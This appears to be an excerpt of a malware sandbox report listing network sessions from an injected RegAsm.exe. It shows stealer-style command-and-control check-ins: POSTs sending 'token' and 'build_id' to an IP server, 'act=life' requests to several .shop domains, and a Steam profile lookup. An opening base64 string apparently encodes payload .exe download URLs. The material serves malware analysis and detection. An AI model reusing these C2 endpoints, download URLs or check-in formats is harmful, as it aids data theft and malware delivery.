10cMTIyMDYwOHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkYmFjYTM0YWNfbGZkbnNhZm5kcy5leGV8MXxra2trfDEyMjA2MDl8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDF8a2tra3wxMjIwNjEwfGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWQ5YWIwZDRjN19yZH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49756	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:20 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:20 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HCFBKKEBKEBGIDHIEHCFCont
2024-09-26 22:16:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49757	172.67.194.216	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wallkedsleeoi.shop
2024-09-26 22:16:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:21 UTC	780	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tgd44t5biem2i1pdsmhaj33v5g; expires=Mon, 20 Jan 2025 16:03:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18otvXgC%2Ff%2FN3cTqMNI8G%2BDxCTkLiyHeHa8YNs9T1ck%2BrqtClHK%2BSxTGZMeolaDvmBmbT0xwVkpZKFYWEgReI16AtzxQk7YpESPy%2B0PR9BQ2cgAAZ682p3%2Ffq7ZGgKrC88BRhcE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e2bec081971-EWR
2024-09-26 22:16:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49758	104.21.4.136	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:21 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 22:16:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:22 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2fq7n2h9v368mafv0j9gmt0tlf; expires=Mon, 20 Jan 2025 16:03:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pBmOSnv3XrQby%2BnvarK4K%2BsNt9RSrftSgLT9TWmMZtBNRLXj5dnRiNG4jE1eNwmyC3CekzEX2gwMEyyjCBezViqMAwN5i%2Ftcopv0c6iCElj%2Bf1%2BLtTyN6egiPmGSbyaYFOX8OA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e31da834408-EWR
2024-09-26 22:16:22 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49759	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:22 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:22 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FCFBFBFBKFIDHJKFCAFCCont
2024-09-26 22:16:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:23 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49760	188.114.96.3	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:23 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 22:16:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:23 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a9jlcrmhsmk400h8k76jsa6ukf; expires=Mon, 20 Jan 2025 16:03:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CC3o%2F7lDuFvD28T7MPOV8qydKMDSBpN7Z9NyYr6MgWubckehy%2BjJRU%2FYro0ot4V97%2BdCNjl93qcXCN39yO6n01iVDnq5XdO0q0WfuxVRRdTFZcVE1fTY%2BMc9PpxGnIgVMntHBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e384e460c9c-EWR
2024-09-26 22:16:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49761	188.114.97.3	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:23 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 22:16:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:24 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g5vl249dvm93br37unbqeerfi0; expires=Mon, 20 Jan 2025 16:03:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=csV%2BWD5dvpv6xqKTBicp%2FY4nv%2BBHH5znk7sz260WTPEdQPxpkttmmLmf30iI%2BJZUWwW22tlaQ5u47Jq5YvBAt3tY43Y48qIdJBVUMrzW9vSCAcA1RkmfLZZqBlLrzA1GQWVKc7Pp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e3e2c617c7c-EWR
2024-09-26 22:16:24 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49762	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:24 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:24 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EBFHJEGDAFHIJKECFBKJCont
2024-09-26 22:16:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49763	188.114.96.3	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:24 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 22:16:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:25 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h48qu3ikk39051jebel1smollf; expires=Mon, 20 Jan 2025 16:03:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LKIm6nEFpMxD4DCwpy4%2B%2B2TLG5ABKz2uL3zjbUMylrjz5UfTL%2F4WDDFN55crNpbfo2TzXX5S9EUzUKTIzRv0K3vtlx9Gtn7cqMjJX6sadZQDQau6DQ7NPCZARqfr7Zb%2BZ%2BtS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e441c1f0c82-EWR
2024-09-26 22:16:25 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49764	104.21.58.182	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:26 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 22:16:26 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:26 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bhjfrufmnn5ttg8ebmvk7e7pp4; expires=Mon, 20 Jan 2025 16:03:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNBWLwcD0nTDeHhTw3kBaf9WobVxCACx3wzpKNqABFkHgjj2g04%2Bg7FhC8Y4ut55ewwE7o6eS6tzzIsxwqQ5siKcoEPeQDdylSLC07UcCrBCdU45tQmvn1Ve762%2FxX%2FFzcCQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e4c6cb3238a-EWR
2024-09-26 22:16:26 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49765	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:26 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:26 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------IDBAFHDGDGHDGCBFCFIDCont
2024-09-26 22:16:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49766	188.114.97.3	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:27 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 22:16:27 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:27 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0cn5ib0aanu6mbas2eorrifo8i; expires=Mon, 20 Jan 2025 16:03:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsqdUBl0PwTXZrXzoMEpO%2Fo5qBUXr%2BBkqLhBpt1a2MB9ceEvVm73KcxX%2BaCy32bE1vhAXsOPybh%2BONGA2LIfDxU757KGn1M1EYMFE4M0%2Fx7DeDnTBSMBO27R41%2BitVrb2Hm%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e527e1a4277-EWR
2024-09-26 22:16:27 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49768	188.114.96.3	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:28 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 22:16:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:28 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m21pg54ogc48tr21piuimiv77q; expires=Mon, 20 Jan 2025 16:03:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FY3D5gdj8n%2F19mxzh%2FQdyNSH5gWl%2B0Io2QE4KY040rhrGCWNsLebru%2FfZAUgtcz0EaJRj%2FPWY%2BlyZURNED1d4UcgaAxcyAuWIdmj6i%2Ftl2tdnfxGWPtNtMeusgqgLM%2FFZMz8EdM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e586ce4c434-EWR
2024-09-26 22:16:28 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49769	172.67.208.139	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:29 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 22:16:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:16:29 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:16:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0i0an8ignks0tpkpukcpvn955u; expires=Mon, 20 Jan 2025 16:03:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ZpL4B2xEghFmiUj1xH49lzC%2FG48BQW0ZUdwYl7%2Bs5QEKfFkNn%2FMFcYUGe7FzWeABha6N6Ff6NLKGRJxgHS6%2BQxlDpHojjfi%2FjvzGysWpoekIJk5uERz8ZIGrJriOERqt%2B9Q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969e5e9b9e41df-EWR
2024-09-26 22:16:29 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:16:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49770	104.102.49.254	443	8088	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:30 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 22:16:30 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT 